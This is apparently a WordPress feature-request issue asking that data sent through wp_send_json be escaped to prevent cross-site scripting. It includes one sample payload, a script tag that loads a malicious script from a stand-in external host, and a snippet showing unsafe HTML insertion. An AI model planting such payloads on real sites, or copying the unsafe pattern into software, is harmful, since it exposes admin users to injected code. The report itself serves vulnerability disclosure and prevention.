wp_send_json/wp_send_json_error/wp_send_json_success XSS/should require escaping

[kkmuffme]

Is your feature request related to a problem?

The value/data sent in wp_send_json is never escaped and there's no escaping error reported for it either.
This allows for extremely simple XSS in many cases.

in it's most simplistic form a user sets his e.g. last name/address/whatever to <script src="https://external.com/malicious.js"></script>

Then in wp-admin another user interacts with that and it's saved with ajax, with code like
wp_send_json_success( 'Updated ' + old_address );
Then the response is inserted in the website using

const notice = '<div class="notice success"><p>' + response.data + '</p></div>';
document.getElementById( '...' ).insertAdjacentHTML( 'afterbegin', notice );

There are multiple similar XSS attack vectors active on multiple large plugins atm, which is why I kept it rather vague on purpose

Describe the solution you'd like

require escaping at least for string, ideally for all variables passed to those functions

Additional context (optional)

• I intend to create a pull request to implement this feature.